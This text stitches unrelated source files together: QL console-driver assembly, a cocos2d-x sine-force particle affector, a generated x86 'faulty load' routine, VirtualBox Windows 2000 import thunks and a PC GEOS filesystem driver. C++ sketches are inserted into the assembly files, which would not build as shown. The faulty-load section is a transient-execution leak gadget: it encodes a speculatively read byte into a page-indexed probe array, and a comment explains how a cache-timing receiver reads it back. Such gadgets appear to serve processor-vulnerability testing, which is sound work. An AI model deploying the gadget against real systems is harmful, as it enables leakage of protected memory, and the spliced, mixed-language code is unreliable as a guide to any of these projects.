; Console I/O Entry 1998 Tony Tebby
; 2004-03-27 1.01 compatible with new cursor toggle
;
; Entry point for all Bit Image I/O calls: translates the
; supplied parameters to those used by the medium level routines
; and calls them.
;
; Registers:
; Entry Exit
; D0 I/O key error code
; D1 parameter return
; D2 parameter smashed
; D3 0 on first entry, else -1 smashed
; D4-D7 smashed
; A0 base of cdb preserved
; A1 parameter return
; A2
; A3 base of dddb preserved
; A4/A5 preserved
; A6 base of sysvars preserved
; A7 system stack pointer preserved
;
section con
include 'dev8_keys_err'
include 'dev8_keys_sys'
include 'dev8_keys_con'
xref cn_curtg
xref cn_donl
xref.s cn.iotab
xref cn_iotab
xdef cn_io
cn..crem equ 0
cn.cremv equ 1
cn_io
cmp.w #cn.iotab,d0 ; out of range?
bhi.s cn_unimp
move.w d0,d7
add.w d7,d7 ; get offset in table
move.w cn_iotab(pc,d7.w),d7 ; offset of routine
bclr #cn..crem,d7 ; does it require the cursor removed?
beq.s cn_doio ; no, just do I/O
tst.b sys_dfrz(a6) ; display frozen?
bne.s cni_nc ; ... yes
move.b sd_curf(a0),-(a7) ; keep old status
tst.b sd_curf(a0) ; cursor visible?
ble.s cni_dfio ; ... no, ok
move.b #-1,sd_curf(a0)
jsr cn_curtg(pc) ; toggle cursor - make invisible
cni_dfio
bsr.s cn_doio ; do the I/O
move.b (a7)+,sd_curf(a0) ; old cursor status
tst.b sd_curf(a0) ; needs to be visible?
ble.s cni_rtd0 ; nope, just return, then
;
; The next bit of code is intended to reproduce a bug in the QL console driver
; which does not do a pending newline on exit from SBYT or SMUL if the cursor
; is enabled (indeed, it goes completely wrong if the newline is implicit)
;
btst #0,sd_nlsta(a0) ; pending newline required?
beq.s cni_crest ; ... no
jsr cn_donl ; ... yes, do it
; move.b #1,sd_curf(a0) ; show cursor needs to be visible
cni_crest
jmp cn_curtg ; yes, flip it back
cni_rtd0
tst.l d0
rts
cni_nc
moveq #err.nc,d0
rts
cn_doio
jmp cn_iotab(pc,d7.w)
cn_unimp
moveq #err.ipar,d0
rts
end
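;
; In high-level terms, cn_io validates the key, fetches a word from a table
; whose bit 0 flags "remove the cursor first", clears that bit, and jumps.
; A minimal C++ sketch of the same dispatch (table size, handler names and
; error values here are illustrative stand-ins, not part of the driver):
typedef long (*io_handler)();
const long ERR_IPAR = -15;                 // stand-in for err.ipar
const unsigned CN_IOTAB_MAX = 15;          // stand-in for cn.iotab
struct Entry { io_handler fn; bool needs_cursor_removed; };
extern Entry cn_iotab_cxx[CN_IOTAB_MAX + 1];
long cn_io_cxx(unsigned key, bool& cursor_visible) {
    if (key > CN_IOTAB_MAX) return ERR_IPAR;      // cn_unimp path
    Entry e = cn_iotab_cxx[key];                  // table lookup (cn_iotab)
    if (!e.needs_cursor_removed) return e.fn();   // cn_doio: plain dispatch
    bool was_visible = cursor_visible;            // keep old status
    cursor_visible = false;                       // toggle cursor invisible
    long err = e.fn();                            // do the I/O
    cursor_visible = was_visible;                 // restore cursor status
    return err;
}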
|
/****************************************************************************
Copyright (C) 2013 Henry van Merode. All rights reserved.
Copyright (c) 2015 Chukong Technologies Inc.
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#include "CCPUSineForceAffector.h"
#include "extensions/Particle3D/PU/CCPUParticleSystem3D.h"
NS_CC_BEGIN
// Constants
const float PUSineForceAffector::DEFAULT_FREQ_MIN = 1.0f;
const float PUSineForceAffector::DEFAULT_FREQ_MAX = 1.0f;
//-----------------------------------------------------------------------
PUSineForceAffector::PUSineForceAffector(void) :
PUBaseForceAffector(),
_angle(361),
_frequencyMin(DEFAULT_FREQ_MIN),
_frequencyMax(DEFAULT_FREQ_MAX),
_frequency(1.0f)
{
}
PUSineForceAffector::~PUSineForceAffector( void )
{
}
//-----------------------------------------------------------------------
void PUSineForceAffector::preUpdateAffector(float deltaTime)
{
// Scale by time
_angle += _frequency * deltaTime;
float sineValue = sin(_angle);
_scaledVector = _forceVector * deltaTime * sineValue;
if (_angle > M_PI * 2.0f)
{
_angle = 0.0f;
if (_frequencyMin != _frequencyMax)
{
_frequency = cocos2d::random(_frequencyMin, _frequencyMax);
}
}
}
//-----------------------------------------------------------------------
const float PUSineForceAffector::getFrequencyMin(void) const
{
return _frequencyMin;
}
//-----------------------------------------------------------------------
void PUSineForceAffector::setFrequencyMin(const float frequencyMin)
{
_frequencyMin = frequencyMin;
if (frequencyMin > _frequencyMax)
{
_frequency = frequencyMin;
}
}
//-----------------------------------------------------------------------
const float PUSineForceAffector::getFrequencyMax(void) const
{
return _frequencyMax;
}
//-----------------------------------------------------------------------
void PUSineForceAffector::setFrequencyMax(const float frequencyMax)
{
_frequencyMax = frequencyMax;
_frequency = frequencyMax;
}
//-----------------------------------------------------------------------
void PUSineForceAffector::updatePUAffector( PUParticle3D *particle, float deltaTime )
{
//for (auto iter : _particleSystem->getParticles())
{
//PUParticle3D *particle = iter;
// Affect the direction
if (_forceApplication == FA_ADD)
{
particle->direction += _scaledVector;
}
else
{
particle->direction = (particle->direction + _forceVector) / 2;
}
}
}
PUSineForceAffector* PUSineForceAffector::create()
{
auto psfa = new (std::nothrow) PUSineForceAffector();
psfa->autorelease();
return psfa;
}
void PUSineForceAffector::copyAttributesTo( PUAffector* affector )
{
PUAffector::copyAttributesTo(affector);
PUSineForceAffector* sineForceAffector = static_cast<PUSineForceAffector*>(affector);
sineForceAffector->_frequencyMin = _frequencyMin;
sineForceAffector->_frequencyMax = _frequencyMax;
sineForceAffector->_frequency = _frequency;
sineForceAffector->_angle = _angle;
}
NS_CC_END
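// A minimal usage sketch (editor's illustration, not part of cocos2d-x):
// build the affector, give it a frequency band, and step it once. Note that
// setFrequencyMax() above also overwrites the working _frequency, and that
// preUpdateAffector() re-randomizes _frequency each time _angle passes 2*pi.
static void sineForceAffectorExample()
{
    auto* affector = cocos2d::PUSineForceAffector::create();
    affector->setFrequencyMin(0.5f);
    affector->setFrequencyMax(2.0f);            // also seeds _frequency = 2.0f
    affector->preUpdateAffector(1.0f / 60.0f);  // scales the force by sin(_angle)
}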
|
.global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r11
push %r13
push %r14
push %r8
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_UC_ht+0x5d0, %r14
nop
nop
nop
nop
and %r13, %r13
movb $0x61, (%r14)
nop
nop
nop
nop
add %r8, %r8
lea addresses_D_ht+0x13def, %r10
nop
sub $20885, %r8
movups (%r10), %xmm5
vpextrq $1, %xmm5, %r11
nop
nop
nop
nop
nop
inc %r11
lea addresses_WT_ht+0x1edf8, %r10
nop
add $33867, %rcx
vmovups (%r10), %ymm4
vextracti128 $0, %ymm4, %xmm4
vpextrq $0, %xmm4, %r14
nop
nop
nop
nop
nop
lfence
lea addresses_A_ht+0x1d678, %r14
add %rbx, %rbx
mov $0x6162636465666768, %rcx
movq %rcx, (%r14)
nop
nop
nop
add $11314, %r8
lea addresses_WC_ht+0x720, %rsi
lea addresses_WT_ht+0x7ec9, %rdi
clflush (%rdi)
nop
nop
dec %r11
mov $9, %rcx
rep movsl
dec %r13
lea addresses_A_ht+0x100d4, %rsi
lea addresses_WC_ht+0x1ea50, %rdi
nop
and $21995, %r10
mov $86, %rcx
rep movsl
sub %r11, %r11
pop %rsi
pop %rdi
pop %rcx
pop %rbx
pop %r8
pop %r14
pop %r13
pop %r11
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r12
push %r14
push %r15
push %r8
push %r9
push %rbx
push %rdx
// Store
lea addresses_A+0x348, %r14
nop
xor $18396, %r15
movw $0x5152, (%r14)
nop
nop
xor $13744, %rbx
// Store
lea addresses_US+0x156f8, %rbx
clflush (%rbx)
nop
nop
nop
inc %rdx
movb $0x51, (%rbx)
nop
nop
dec %rdx
// Store
lea addresses_PSE+0x123a0, %r15
clflush (%r15)
nop
sub %r12, %r12
mov $0x5152535455565758, %r14
movq %r14, (%r15)
nop
nop
nop
nop
and $58978, %r12
// Faulty Load
lea addresses_normal+0xe678, %r15
dec %r12
vmovups (%r15), %ymm2
vextracti128 $0, %ymm2, %xmm2
vpextrq $0, %xmm2, %r14
lea oracles, %rbx
and $0xff, %r14
shlq $12, %r14
mov (%rbx,%r14,1), %r14
pop %rdx
pop %rbx
pop %r9
pop %r8
pop %r15
pop %r14
pop %r12
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'type': 'addresses_normal', 'size': 16, 'AVXalign': True, 'NT': False, 'congruent': 0, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_A', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 2, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_US', 'size': 1, 'AVXalign': False, 'NT': True, 'congruent': 5, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_PSE', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 3, 'same': False}}
[Faulty Load]
{'OP': 'LOAD', 'src': {'type': 'addresses_normal', 'size': 32, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': True}}
<gen_prepare_buffer>
{'OP': 'STOR', 'dst': {'type': 'addresses_UC_ht', 'size': 1, 'AVXalign': True, 'NT': False, 'congruent': 3, 'same': False}}
{'OP': 'LOAD', 'src': {'type': 'addresses_D_ht', 'size': 16, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': False}}
{'OP': 'LOAD', 'src': {'type': 'addresses_WT_ht', 'size': 32, 'AVXalign': False, 'NT': False, 'congruent': 6, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_A_ht', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 11, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_WC_ht', 'congruent': 3, 'same': False}, 'dst': {'type': 'addresses_WT_ht', 'congruent': 0, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_A_ht', 'congruent': 2, 'same': False}, 'dst': {'type': 'addresses_WC_ht', 'congruent': 1, 'same': False}}
{'34': 454}
34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34
*/
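//
// The tail of s_faulty_load is the classic transient-execution encoding
// gadget: mask the speculatively loaded byte to 8 bits, scale it by the
// page size, and touch one line of the "oracles" probe array so a receiver
// can later time which page is cached. A rough C++ equivalent (the array
// shape is inferred from the 0xff mask and the shift by 12):
extern unsigned char oracles_cxx[256 * 4096];   // one 4 KiB page per byte value
inline unsigned long encode_byte(unsigned long leaked) {
    unsigned long idx = (leaked & 0xff) << 12;  // and $0xff, %r14 ; shlq $12, %r14
    return oracles_cxx[idx];                    // mov (%rbx,%r14,1), %r14
}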
|
; $Id: Win2kWorkaroundsA.asm $
;; @file
; VirtualBox Windows Guest Shared Folders - Windows 2000 Hacks, Assembly Parts.
;
;
; Copyright (C) 2006-2017 Oracle Corporation
;
; This file is part of VirtualBox Open Source Edition (OSE), as
; available from http://www.virtualbox.org. This file is free software;
; you can redistribute it and/or modify it under the terms of the GNU
; General Public License (GPL) as published by the Free Software
; Foundation, in version 2 as it comes in the "COPYING" file of the
; VirtualBox OSE distribution. VirtualBox OSE is distributed in the
; hope that it will be useful, but WITHOUT ANY WARRANTY of any kind.
;
;*******************************************************************************
;* Header Files *
;*******************************************************************************
%include "iprt/asmdefs.mac"
%ifndef RT_ARCH_X86
%error "This is x86 only code.
%endif
%macro MAKE_IMPORT_ENTRY 2
extern _ %+ %1 %+ @ %+ %2
global __imp__ %+ %1 %+ @ %+ %2
__imp__ %+ %1 %+ @ %+ %2:
dd _ %+ %1 %+ @ %+ %2
%endmacro
BEGINDATA
;MAKE_IMPORT_ENTRY FsRtlTeardownPerStreamContexts, 4
MAKE_IMPORT_ENTRY RtlGetVersion, 4
MAKE_IMPORT_ENTRY PsGetProcessImageFileName, 4
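;
; In C++ terms, each MAKE_IMPORT_ENTRY expands to a data pointer named
; __imp__<Name>@<argbytes> that simply aims at the statically resolved
; symbol, which satisfies call sites compiled to indirect through dllimport
; thunks. A hedged sketch ('@' cannot appear in a C++ identifier, so the
; decorated name is only approximated, and the signature is simplified):
extern "C" long __stdcall RtlGetVersion(void* versionInfo);
// what "__imp__RtlGetVersion@4" amounts to: a pointer through which
// dllimport-style call sites indirect
extern "C" long (__stdcall* imp_RtlGetVersion_4)(void*) = &RtlGetVersion;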
|
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Copyright (c) Geoworks 1994 -- All Rights Reserved
PROJECT: PC GEOS
MODULE:
FILE: pgfsDevSpec.asm
AUTHOR: Chris Boyke
ROUTINES:
Name Description
---- -----------
REVISION HISTORY:
Name Date Description
---- ---- -----------
chrisb 4/27/94 Initial version.
DESCRIPTION:
$Id: pgfsDevSpec.asm,v 1.1 97/04/18 11:46:36 newdeal Exp $
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
Resident segment resource
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
GFSDevExit
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Finish with the filesystem
CALLED BY: GFSExit
PASS: nothing
RETURN: nothing
DESTROYED: nothing
SIDE EFFECTS:
PSEUDO CODE/STRATEGY:
REVISION HISTORY:
Name Date Description
---- ---- -----------
ardeb 4/14/93 Initial version
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
GFSDevExit proc far
.enter
.leave
ret
GFSDevExit endp
Resident ends
Movable segment resource
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
GFSDevMapDir
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Bring in the contents of the indicated directory
CALLED BY: EXTERNAL
PASS: dxax = offset of directory
RETURN: carry set on error:
ax = FileError
es, di = destroyed
carry clear if ok:
es:di = first entry in the directory
ax = destroyed
DESTROYED: nothing
SIDE EFFECTS:
PSEUDO CODE/STRATEGY:
REVISION HISTORY:
Name Date Description
---- ---- -----------
ardeb 4/14/93 Initial version
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
GFSDevMapDir proc near
uses ds, bx
.enter
call PGFSMapOffsetFar
.leave
ret
GFSDevMapDir endp
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
GFSDevUnmapDir
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Unmap a directory
CALLED BY: EXTERNAL
PASS: nothing
RETURN: nothing
DESTROYED: nothing (flags preserved)
SIDE EFFECTS:
PSEUDO CODE/STRATEGY:
REVISION HISTORY:
Name Date Description
---- ---- -----------
ardeb 4/14/93 Initial version
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
GFSDevUnmapDir equ PGFSUnmapLastOffset
Movable ends
Resident segment resource
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
GFSDevMapEA
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Bring in the extended attributes for a file.
CALLED BY: EXTERNAL
PASS: dxax = offset of extended attributes
RETURN: carry set on error:
ax = FileError for caller to return
carry clear if ok:
es:di = GFSExtAttrs
DESTROYED: nothing
SIDE EFFECTS:
PSEUDO CODE/STRATEGY:
REVISION HISTORY:
Name Date Description
---- ---- -----------
ardeb 4/14/93 Initial version
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
GFSDevMapEA proc far
uses ds, bx
.enter
call PGFSMapOffset
.leave
ret
GFSDevMapEA endp
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
GFSDevUnmapEA
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Unlock the extended attributes we read in last.
CALLED BY: EXTERNAL
PASS: nothing
RETURN: nothing
DESTROYED: nothing (flags preserved)
SIDE EFFECTS:
PSEUDO CODE/STRATEGY:
REVISION HISTORY:
Name Date Description
---- ---- -----------
ardeb 4/14/93 Initial version
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
GFSDevUnmapEA equ PGFSUnmapLastOffset
Resident ends
Movable segment resource
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
GFSDevFirstEA
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Figure the offset of the first extended attribute
structure for this directory.
CALLED BY: EXTERNAL
PASS: dxax = base of directory
cx = # directory entries in there
RETURN: dxax = offset of first extended attribute structure
DESTROYED: nothing
SIDE EFFECTS:
PSEUDO CODE/STRATEGY:
REVISION HISTORY:
Name Date Description
---- ---- -----------
ardeb 4/14/93 Initial version
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
GFSDevFirstEA proc far
uses bx, si
.enter
movdw bxsi, dxax
mov ax, size GFSDirEntry
mul cx
adddw dxax, bxsi
;
; Round the offset up to the next GFSExtAttrs (256-byte) boundary.
;
adddw dxax, <size GFSExtAttrs-1>
andnf ax, not (size GFSExtAttrs-1)
.leave
ret
GFSDevFirstEA endp
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
GFSDevNextEA
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Figure out the start of the next GFSExtAttrs structure in
a directory, given the offset of the current one
CALLED BY: EXTERNAL
PASS: dxax = base of current ea structure
RETURN: dxax = base of next
DESTROYED: nothing
SIDE EFFECTS:
PSEUDO CODE/STRATEGY:
REVISION HISTORY:
Name Date Description
---- ---- -----------
ardeb 4/14/93 Initial version
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
GFSDevNextEA proc near
.enter
add ax, size GFSExtAttrs
adc dx, 0
.leave
ret
GFSDevNextEA endp
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
GFSDevLocateEA
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Locate the extended attrs for a file given the base of
the directory that contains it, the number of entries
in the directory, and the entry # of the file in the directory
CALLED BY: EXTERNAL
PASS: dxax = base of directory
cx = # of entries in the directory
bx = entry # within the directory
RETURN: dxax = base of extended attrs
DESTROYED: nothing
SIDE EFFECTS:
PSEUDO CODE/STRATEGY:
REVISION HISTORY:
Name Date Description
---- ---- -----------
ardeb 4/14/93 Initial version
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
GFSDevLocateEA proc near
uses cx, si
.enter
call GFSDevFirstEA
movdw cxsi, dxax
mov ax, size GFSExtAttrs
mul bx
adddw dxax, cxsi
.leave
ret
GFSDevLocateEA endp
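;
; The extended-attribute addressing above reduces to plain arithmetic; a
; C++ sketch, assuming sizeof(GFSExtAttrs) == 256 (as the rounding mask
; implies) and an illustrative directory-entry size:
const unsigned long kExtAttrsSize = 256;  // size GFSExtAttrs (from the mask)
const unsigned long kDirEntrySize = 32;   // size GFSDirEntry (assumed here)
unsigned long firstEA(unsigned long dirBase, unsigned entries) {
    unsigned long end = dirBase + entries * kDirEntrySize;  // end of directory
    return (end + kExtAttrsSize - 1) & ~(kExtAttrsSize - 1); // round up
}
unsigned long locateEA(unsigned long dirBase, unsigned entries, unsigned n) {
    return firstEA(dirBase, entries) + n * kExtAttrsSize;   // index into EAs
}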
Movable ends
Resident segment resource
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
GFSDevLock
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Gain exclusive access to the filesystem
CALLED BY: EXTERNAL
PASS: al - GFSDevLockFlags
es:bx - GFSFileEntry (if GDLF_FILE is set)
es:si - DiskDesc (if GDLF_DISK set)
RETURN: nothing
DESTROYED: ax
SIDE EFFECTS:
PSEUDO CODE/STRATEGY:
REVISION HISTORY:
Name Date Description
---- ---- -----------
chrisb 5/1/94 Initial version
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
GFSDevLock proc far
uses ds, bx, cx
.enter
call LoadVarSegDS
PSem ds, fileSem
test al, mask GDLF_FILE
jz notFile
mov bx, es:[bx].GFE_socket
store:
mov ds:[curSocketPtr], bx
done:
.leave
ret
notFile:
test al, mask GDLF_DISK
jz done
;
; Hack! Store the disk handle in dgroup, in case we ever use
; it (open/close notification)
;
mov ds:[gfsDisk], si
push si
mov si, es:[si].DD_drive
mov si, es:[si].DSE_private
mov bx, es:[si].PGFSPD_socketPtr
pop si
jmp store
GFSDevLock endp
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
GFSDevUnlock
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Release exclusive access to the filesystem.
CALLED BY: EXTERNAL
PASS: nothing
RETURN: nothing
DESTROYED: nothing (flags preserved)
SIDE EFFECTS:
PSEUDO CODE/STRATEGY:
REVISION HISTORY:
Name Date Description
---- ---- -----------
ardeb 4/14/93 Initial version
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
GFSDevUnlock proc far
uses ds, bx, ax
EC < uses si >
.enter
pushf
call LoadVarSegDS
EC < mov ds:[curSocketPtr], -1 >
EC < tst ds:[fsMapped] >
EC < ERROR_NZ SOMETHING_NOT_UNMAPPED >
VSem ds, fileSem, TRASH_AX_BX
popf
.leave
ret
GFSDevUnlock endp
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
GFSDevRead
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Read bytes from the filesystem
CALLED BY: EXTERNAL
PASS: dxax = offset from which to read them
cx = number of bytes to read
es:di = place to which to read them
RETURN: carry set on error:
ax = FileError
carry clear if all bytes read
ax = destroyed
DESTROYED: nothing
SIDE EFFECTS: none
PSEUDO CODE/STRATEGY:
REVISION HISTORY:
Name Date Description
---- ---- -----------
ardeb 4/14/93 Initial version
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
GFSDevRead proc far
uses bx, cx, dx, di, si, bp, ds
.enter
mov bp, cx ; number of bytes to move
mapLoop:
;
; Map in the initial data. Comes back with es:di = data, but we need
; ds:si
;
push es, di
call PGFSMapOffset
mov bl, ds:[bx].PGFSSI_flags
segmov ds, es, si
mov si, di
pop es, di
jc done
;
; Figure number of bytes to use from this bank.
;
mov cx, BANK_SIZE
sub cx, si ; cx <- # bytes to bank end
cmp cx, bp ; more than we need?
jbe moveIt ; no
mov cx, bp ; get only what we need
moveIt:
;
; Reduce overall count by the number of bytes being moved now, then
; move them.
;
add ax, cx
adc dx, 0 ; point dx:ax to start of
; next bank
sub bp, cx
pushf ; save Z flag from subtraction
test bl, mask PSF_16_BIT
jz moveBytes
shr cx
rep movsw
jnc afterMove
movsb
afterMove:
EC < call PGFSUnmapLastOffset >
popf ; restore Z flag
jnz mapLoop
done:
.leave
ret
moveBytes:
rep movsb
jmp afterMove
GFSDevRead endp
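;
; GFSDevRead's bank-walking loop in C++ terms: map the bank containing the
; current offset, copy up to the end of that bank or the remaining count,
; whichever is smaller, then advance and repeat. (Sketch only; mapBank()
; stands in for PGFSMapOffset and the bank size here is illustrative.)
#include <cstring>
const unsigned long BANK_SIZE_CXX = 0x4000;                 // assumed bank size
extern const unsigned char* mapBank(unsigned long offset);  // -> in-bank pointer
void gfsRead(unsigned long offset, unsigned char* dst, unsigned long count) {
    while (count) {
        const unsigned char* src = mapBank(offset);         // PGFSMapOffset
        unsigned long inBank = BANK_SIZE_CXX - (offset % BANK_SIZE_CXX);
        unsigned long chunk = inBank < count ? inBank : count;
        std::memcpy(dst, src, chunk);                       // rep movsw / movsb
        offset += chunk; dst += chunk; count -= chunk;
    }
}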
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
PGFSUnmapLastOffset
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Unmap the thing we mapped before
CALLED BY: INTERNAL
PASS: nothing
RETURN: nothing
DESTROYED: nothing (flags preserved)
SIDE EFFECTS:
PSEUDO CODE/STRATEGY:
Don't actually do anything
REVISION HISTORY:
Name Date Description
---- ---- -----------
ardeb 4/16/93 Initial version
